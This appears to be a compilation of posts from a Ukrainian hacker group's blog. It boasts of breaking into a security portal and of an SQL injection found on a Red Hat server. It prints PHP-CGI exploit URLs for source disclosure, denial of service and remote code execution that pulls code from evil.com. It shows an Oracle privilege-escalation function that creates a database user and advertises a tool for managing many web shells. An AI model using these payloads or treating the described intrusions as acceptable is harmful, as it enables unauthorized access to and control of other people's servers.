Очень обидно что многие конторы, фирмы да и просто форумы блоги по безопасности в сети, сами же не следят за своей безопасностью. Исключением не стал портал inattack.ru. Админы видимо не совсем следят за обновлением ПО сервера, поэтому и случился этот дружеский взлом от UASC. Мы не занимается деструктивной деятельностью, поэтому не стоит от нас ожидать дефейсов, удаление файлов, распространения в паблике дампов и т.д.

Но факт остается факт, взлом был и зеркало было поднято на локалхосте. Как оказалось у ребят с inattack.ru есть приватные разделы, но там все очень скучно. Чесно говоря даже не ожидал что настолько.

Ну и как  пологается – пруфпик:

#################################################
# Security d!gger – Online web scanner REPORT #
#################################################
На нашем проекте поднят сервис по сканированию веб ресурсов на наличие директорий. Автор сервиса brainpillow.
Попробовать можно сдесь - http://uasc.org.ua/s/

bugs.php.net повідомляє про критичну вразливість PHP, яка дозволяє читати вихідний код скриптів. Для цього PHP повинен бути налаштований як CGI

Вразливість пов’язана з тим,  що сервер, сприймає параметри запиту, як параметри запуску CGI, якщо після “?” відсутній знак рівності. Для прикладу зловмисник може отримати вихідний код сайту звернувшись до сервера:

http://localhost/index.php?-s

Існують і інші варіанти експлуатації вразливості:

DoS атака:

http://localhost/index.php ?-T+100000

Виконання коду:

 http://localhost/index.php ?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://evil.com/code.txt%20-n

Закриття вразливості.

Наразі вразлива остання версія PHP (5.4.2) але сьогодні вже вийшов патч:завантажити

В старих файлах знайшов стару версію списку структур таблиць та алгоритмів хешування в відомих CMS.

http://uasc.org.ua/files/dbitems/

Користуємся на здоров’я

Викладаю свою бібліотеку, за яку Пакет ризикує найти в логах не працюючого веб-сервера, гет запити з параметром  first_and_last_warning=on

Але пацани з UASC не бояться і запаслися сплойтами вже готові  прийняти трафік.

Жарти жартами, але ось, що ця бібліотека вміє.

• Авторизуватися
• Оновлювати статус
• Писати на стіну
• І відсилати повідомлення

Також варто відмітити що в классі є свій блек джек і шлюхи шахи і поетесси. Класс кешує печеньки, також хеші (які дістаються регулярками), для різних операцій, тому правильно налаштуйте setCookiePath, також потрібно вказати своє ід - setID.

Взаємодія виконується через m.vk.com.

Також присутня помилка, яка не дозволить запустити скрипт кіддісам .

Взаємодія виглядає приблизно так.

$auth = AuthVK::init();
//$auth = new AuthVK;
$auth->setEmail('login');
$auth->setPassword('pass');
$auth->setCookiePath('C:\\xampp\\htdocs\\vk\\');
$auth->setID('your id');

$auth->auth();
$auth->updateStatus(‘text’);
$auth->postToWall(‘text’);
$auth->sendMessage(’1′,’hello from uasc’);

Завантажити можна тут.

Чекайте вкусняшок для юкозу

Матеріали наданні для ознайомлення. Автор не несе відповідальності за протиправні дії, які можуть виникнути, при використанні даного програмного продукту.

Пройшло майже 2 роки з того часу, як перестав функціонувати сайт UASC. Багато встигло статись з тих пір у світі,  змінились технології, методи, люди. Але ми повертаємся! Можливо дещо зміниться наш  формат висвітлення новин в галузі ІТ, вразливостей і т.д., але ми будемо намагатись  виправдати ваші очікування.

П.С. Нам дуже потрібні нові люди готові бути частиною команди! Чекаємо ваші анкети – http://uasc.org.ua/долучитись-join-us/

Після невдалого rfilfi на одному з серверів AOL, шукав я де б знайти чогось відомого, ось и натрапив на редхат, а там швиденько знайшов скулю. blind sql-inj. Як виявилось, там ще у юзера і file_priv=y.

Не буду тягнуть кота за яйця:
Read more…

Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.

...
30 CUR := DBMS_SQL.OPEN_CURSOR;
31 BEGIN
32
33 DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
34 ' from dual', DBMS_SQL.NATIVE );
...

INTERVAL – вразливий параметр. Але тут проблема: функція не оголошена в пакеті, тобто її можна використовувати тільки всередині пакету, під мої потреби це не підходить, хоча, можливо  комусь і буде потрібно. Але щоб довести справу до переможного кінця,  знайшов процедуру в пакеті яка цю функцію використовує, вона там не одна, але так як мені ця функція не підійшла, я взяв першу ліпшу.

...
134 MYDATE: = FIND_DATE (INTERVAL);
135 IF NOT NO_PARSE THEN
136 PARSE_JOB (WHAT);
137 END IF;
138
...

Створюємо функцію, хоча можна використати і курсор, але я віддаю перевагу старій школі.

CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'create user fff identified by fff';
COMMIT;
RETURN 'sys';
END;
/

Ну і власне сам експлойт (під катом):
Read more...

madShellC0ntr01 v1.2

Писався софт достатньо давно, та і виключно в цілях ознайомлення Якщо чесно, то я вже навіть не пам’ятаю чи реалізував все що хотів, чи ні (хоча скоріше, що ні). Отже, дозвольте представити вам систему для роботи з великою кількістю веб-шеллів типу madshell.

Меню:

Думаю все інтуїтивно зрозуміло (:

В версії 1.2 система автоматично оприділяє такі параметри:

• Safe Mode
• Platform
• Version
• Country

Стандартна пара логін-пароль: admin:pass

Завантажити

1 квітня стартувала спільна акція Skype і Приватбанка з розповсюдження безкоштовних ваучерів для поповнення рахунку популярного інтернет-телефону.
Протягом періоду дії акції з 01.04.10 по 08.04.10 кожен бажаючий зможе взяти участь відразу в двох конкурсах і гарантовано поповнити не тільки свій рахунок Skype, але і розіграти суми поповнення для своїх друзів.

Read more…